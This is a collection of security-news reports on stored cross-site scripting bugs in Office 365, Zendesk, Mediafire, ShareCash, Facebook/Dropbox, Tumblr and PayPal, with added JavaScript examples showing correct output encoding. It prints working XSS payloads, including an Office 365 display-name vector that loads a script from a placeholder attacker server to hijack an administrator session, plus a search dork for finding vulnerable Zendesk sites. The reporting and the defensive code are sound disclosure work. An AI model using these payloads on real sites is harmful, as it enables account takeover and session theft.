Persistent XSS Vulnerability in Office 365 website allows attackers to hack Admin account



The firm Cogmotive has discovered a potentially critical persistent cross-site scripting (XSS) vulnerability in Office 365, the cloud version of Office.  Successful exploitation allows an attacker to take control of the administrator account.

To exploit this vulnerability, the attacker has to be one of the users.  A malicious employee can change their own display name to an XSS vector.

For instance, an attacker can modify his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'
The User administration page displays the list of users in the portal, so if a user changes his display name, the new value is shown on that page.

When an admin user logs into the portal and opens the "User administration" page, the payload is executed.  It loads the malicious JavaScript file hosted on the attacker's server and runs it in the administrator's session.

An attacker can exploit this vulnerability to create an administrator within the company's Office 365 environment.

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365," Alan Byrne, co-founder of Cogmotive, said on the company's blog.

Alan immediately reported the bug to Microsoft in October 2013.  In December 2013, Microsoft patched the vulnerability.




Persistent XSS vulnerability in Zendesk Support Ticket System

An information security researcher, Sukhwinder Singh, has identified a critical security flaw in one of the top support ticket systems, provided by Zendesk.

The title field is vulnerable to persistent cross-site scripting.  The researcher managed to create a ticket with this title: "><script>alert(/Sukhwinder Singh/)</script>.

Although the developer of this app sanitizes the title before it is displayed to the user, the title is stored in the database without sanitization.

The title is therefore sanitized every time it is displayed on the page.  Unfortunately, the developers failed to remove the special characters before writing the title into the data-text attribute of the Twitter_button code.
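
The flaw described above (a title stored raw, encoded in one place on the page but not in the share-button attribute) is shown here next to a corrected renderer. This is an added example, not Zendesk code; the function names and the markup are assumptions made for illustration.

```javascript
// Added example: function names and markup are hypothetical, not Zendesk code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for HTML element content and for quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Flawed pattern from the report: heading encoded, share-button attribute not.
function renderTicketFlawed(title) {
  return `<h1>${escapeHtml(title)}</h1>` +
    `<a class="twitter-share-button" data-text="${title}">Tweet</a>`;
}

// Corrected: every sink that receives the stored title goes through the encoder.
function renderTicketFixed(title) {
  const safe = escapeHtml(title);
  return `<h1>${safe}</h1>` +
    `<a class="twitter-share-button" data-text="${safe}">Tweet</a>`;
}

// Regression check: list tag names in the output that the template never emits.
function unexpectedTags(html, allowed = ['h1', 'a']) {
  const found = new Set();
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g)) {
    const name = m[1].toLowerCase();
    if (!allowed.includes(name)) found.add(name);
  }
  return [...found];
}

// Ticket title quoted in the article, stored exactly as submitted.
const STORED_TITLE = '"><script>alert(/Sukhwinder Singh/)</script>';

console.log(unexpectedTags(renderTicketFlawed(STORED_TITLE)));
console.log(unexpectedTags(renderTicketFixed(STORED_TITLE)));
```

A check like unexpectedTags can run in a template test suite so that a newly added sink that skips the encoder fails the build.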


POC:
https://support.zuora.com/entries/23275787--script-alert-Sukhwinder-Singh-script-

The Google dork "Support Ticket System by Zendesk" returns thousands of websites that use this application.

The researcher claimed to have contacted Zendesk, but there has been no response from their side.  I've also sent a notification to Zendesk.

File Upload XSS Vulnerability in Mediafire

An information security researcher, Mahadev Subedi, from coolpokharacity.com has claimed to have discovered a persistent cross-site scripting vulnerability in the Mediafire website (mediafire.com).

It seems the vulnerability exists in Mediafire's file upload feature.  The developers fail to sanitize the file name of the uploaded file.

"Whenever we upload file names containing encoded or decoded malicious XSS codes, it results in Cross Site Scripting," the researcher said in the email.

For instance, if you create a file with this name and upload it, it results in XSS:
"><img src=x onerror=alert(1)>.jpg.txt
Recently, security researcher Frans Rosén discovered a similar kind of vulnerability in DropBox.

Sharecash vulnerable to Persistent Cross Site Scripting vulnerability

Security researcher Rafay Baloch, the founder of Rafay Hacking Articles, has discovered a cross-site scripting (XSS) vulnerability in the ShareCash website (sharecash.org). ShareCash is the highest paying Pay-Per-Download network around.

The vulnerability affects the "Manage Widget" page of ShareCash.  The XSS vulnerability was found to be a stored one.

Stored XSS Vulnerability

Stored XSS is critical because the script is stored on the server and is executed every time a user visits the affected page.

In an email sent to EHN, the researcher provided a screenshot of the proof-of-concept.  From the POC, I came to know that the "Widget Name" is vulnerable to XSS attack.  It seems like the developer fails to validate the input.

Rafay claimed that he sent more than 10 emails to ShareCash to notify them about the vulnerability, but they failed to respond.

Stored XSS vulnerability in Facebook and researcher got $3,500 Bug Bounty

Security researcher Frans Rosén has discovered cross-site scripting vulnerabilities in Facebook and DropBox.

Initially, the researcher was working on finding security flaws in DropBox.  He noticed that the web interface placed some restrictions on which filenames were allowed.  He tried to rename a file to '"><img src=x onerror=alert(document.domain)>.txt but got an error message saying that some special characters are not allowed.

"But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems," the researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."

He notified DropBox about the vulnerability and they have successfully patched the flaw.

After some time, he noticed that there is a connection between DropBox and Facebook: you can add files directly from DropBox to your Facebook groups. So he was curious to test for the vulnerability in Facebook as well.



In his Facebook group, he tried to add the file he had previously uploaded to DropBox.  After he posted it in the group, the XSS attack didn't work.  But when he clicked the 'Share' link in the post, he got the alert message: he had managed to run the script in Facebook.  The XSS also worked when he shared a crafted pin from Pinterest.

The researcher received a $3,500 USD bug bounty for reporting the vulnerability, and Facebook has now fixed it.

Stored XSS vulnerability in Tumblr can be used for Phishing and Malware attack

Recently we reported that the reason behind the Tumblr reblog attack is a stored cross-site scripting (XSS) vulnerability. The vulnerability was discovered by security researcher Janne Ahlberg. Janne says the vulnerability is not yet fixed.

According to his research, it is possible to embed JavaScript and some other HTML tags in certain Tumblr post types (e.g. video posts).

The vulnerability can be used for launching phishing attacks.  For instance, it would be quite easy to ask for input from the user in various ways. User input could be stored on the attacker's server. The attacker could push malicious files from his/her server to Tumblr users.

"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts," the researcher said, describing one possible attack scenario.

"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."

Persistent Cross Site Scripting Vulnerability in the official Paypal ecommerce


The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the content management system of the official Paypal ecommerce website.

The bug allows remote attackers to inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Artikel pro Seite listing module, in the vulnerable filterVal1 parameter bound to it.

Remote exploitation requires low user interaction or a privileged application user account for local exploitation. Successful exploitation of the vulnerability can lead to session hijacking (admin), account theft via persistent web attack, or stable (persistent) context manipulation.


Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers and local privileged user accounts with low required user interaction.
For demonstration or reproduce ...

Review: [ALL Listing] (index) Rechnungen Verwalten -  Geld Anfordern > Artikel pro Seite (Listing) > filterVal1

var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>


PoC:  "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <

The security risk of the persistent script code injection vulnerability is estimated as medium(+). The vulnerability has been successfully fixed by Paypal.
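
In the listing above, the stored filterVal1 value lands inside a JavaScript string literal in an inline script, where HTML entity encoding alone is the wrong encoder. The following added example (not PayPal code; function names are assumptions) shows the raw interpolation beside a serializer that keeps the value inside the literal.

```javascript
// Added example: function names are hypothetical, not PayPal code.
// Characters that can end or alter an inline script block, plus the two
// line separators that older JavaScript engines reject inside string literals.
const SCRIPT_UNSAFE = /[<>&\u2028\u2029]/g;

// Serialize a value as a JavaScript string literal safe inside <script>...</script>.
function toInlineScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(
    SCRIPT_UNSAFE,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Flawed pattern visible in the listing: raw value pasted between quotes.
function renderFilterFlawed(filterVal1) {
  return `<script>var filterVal1 = "${filterVal1}";</script>`;
}

// Corrected: the literal, including its quotes, comes from the serializer.
function renderFilterFixed(filterVal1) {
  return `<script>var filterVal1 = ${toInlineScriptLiteral(filterVal1)};</script>`;
}

// An intact block has exactly one closing tag; more means the value escaped it.
function countScriptClosers(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Tail of the filterVal1 value shown in the listing above.
const STORED_FILTER = '<script>document.cookie=true;</script>';

console.log(countScriptClosers(renderFilterFlawed(STORED_FILTER)));
console.log(countScriptClosers(renderFilterFixed(STORED_FILTER)));
console.log(JSON.parse(toInlineScriptLiteral(STORED_FILTER)) === STORED_FILTER);
```

The browser's script parser decodes the \u escapes back to the original characters, so the application still receives the exact stored value.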